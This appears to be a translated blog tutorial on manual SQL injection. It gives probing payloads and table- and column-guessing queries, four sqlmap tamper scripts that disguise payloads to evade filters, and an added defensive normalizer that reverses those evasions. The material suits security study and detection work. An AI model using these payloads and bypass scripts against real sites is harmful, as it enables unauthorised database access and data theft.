Manual injection
Basics
test: and 1 = 1, and 1 = 2
Determining whether a parameter is injectable
1. Append a single quote ' after the id and inspect the returned data
2. and (select count(*) from sysobjects)>0
Variables: and user>0 and database>0
SQL injection comes in three kinds: numeric, string and search type
Guessing table names
(Select Count(*) from table_to_guess)>=0
Guessing column names
(Select Count(column_to_guess) from known_table)>=0
Guessing records
and (Select Count(known_column) from known_table)>n, where n is a number you vary
sqlmap bypass scripts
Here I'll just post the code, I'm too lazy to explain it. Oh, and don't forget to create an __init__.py.
#!/usr/bin/env python

from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    # Wrap keywords and separators in MySQL version comments (/*!...*/)
    if payload:
        payload = payload.replace("UNION", "union/*!88888cas*/")
        payload = payload.replace("--", "/*!*/--")
        payload = payload.replace("SELECT", "/*!88888cas*/select")
        payload = payload.replace("FROM", "/*!99999c*//*!99999c*/from")
        payload = payload.replace("#", "/*!*/#")
        payload = payload.replace("USER()", "USER/*!()*/")
        payload = payload.replace("DATABASE()", "DATABASE/*!()*/")
        payload = payload.replace(" ", "/*!*/")
        payload = payload.replace("=", "/*!*/=/*!*/")
        payload = payload.replace("AND", "/*!*/AND/*!*/")

    return payload
It's just string replacement, I don't need to explain further, do I?
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    # replace the original + with %a0
                    retVal += "%a0"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                # replace the original + with %a0
                retVal += "%a0"
                continue

            retVal += payload[i]

    return retVal
Hahaha
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

# import the regex module, used for the character replacement
import re
# PRIORITY from sqlmap's lib\core\enums
from lib.core.enums import PRIORITY

# define the script priority
__priority__ = PRIORITY.NORMAL

# dependency-description function
def dependencies():
    pass

def tamper(payload, **kwargs):
    # keep a copy of the payload
    retVal = payload

    if payload:
        # use re.sub to replace and/or case-insensitively
        # with anandd and oorr
        retVal = re.sub(r"(?i)(or)", r"oorr", retVal)
        retVal = re.sub(r"(?i)(and)", r"anandd", retVal)

    # return the modified payload
    return retVal
Boom boom boom
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload

    if payload:
        # replace count(*) with count(1)
        retVal = re.sub(r"(?i)count\(\*\)", r"count(1)", payload)

    return retVal
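From the defensive side, the four tamper transformations above are all reversible, so a request-inspection filter can normalize a parameter before keyword matching instead of matching the raw string. This is an added example, not code from the original post or from sqlmap; the SAMPLES inputs are constructed to mirror each script's output, and the keyword list stands in for a real ruleset.

```python
import re
from urllib.parse import unquote

# Constructed sample inputs: the shapes the four tamper scripts produce, plus a benign value.
SAMPLES = {
    "version_comment": "1/*!*/union/*!88888cas*//*!*//*!88888cas*/select/*!*/1,2/*!*//*!99999c*//*!99999c*/from/*!*/users",
    "nbsp_space": "1%a0union%a0select%a0user(),2",
    "doubled_keyword": "1 oorr 1=1 anandd 2=2",
    "count_one": "1 and (select count(1) from users)>0",
    "benign": "42",
}

def normalize(value):
    """Undo the four evasions so keyword matching sees the statement the database would run."""
    s = unquote(value, encoding="latin-1")   # %a0 -> U+00A0 (utf-8 decoding would give U+FFFD)
    s = s.replace("\xa0", " ")               # MySQL treats NBSP as whitespace, so do we
    # Versioned comments /*!NNNNN ... */: keep the body, since the server may execute it;
    # treating it as live code is the conservative choice for a detector.
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s)
    s = re.sub(r"/\*.*?\*/", " ", s)         # ordinary comments carry nothing
    s = s.lower()
    # Collapse doubled keywords until stable: oorr -> or, anandd -> and, and nested forms.
    prev = None
    while prev != s:
        prev = s
        s = re.sub(r"o(?:or)+r", "or", s)
        s = re.sub(r"an(?:and)+d", "and", s)
    return " ".join(s.split())

def suspicious_tokens(value):
    """Return the SQL keywords present after normalization. A non-empty list is a signal for
    review, not a verdict: words such as 'from' also occur in ordinary text."""
    norm = normalize(value)
    hits = [kw for kw in ("union", "select", "from", "and", "or")
            if re.search(r"\b%s\b" % kw, norm)]
    if "count(" in norm:                     # count(1) and count(*) both land here
        hits.append("count(")
    return hits

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print("%-16s %-45s -> %s" % (name, normalize(raw), suspicious_tokens(raw)))
```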
*Solemn statement: this article is limited to technical discussion and sharing; use for illegal purposes is strictly prohibited.
Otherwise you'll end up like me...
Hahahahahahahaha
Alright, that's it for today. I'm 铁汉fhoenix. I hope today's content was helpful to you, goodbye.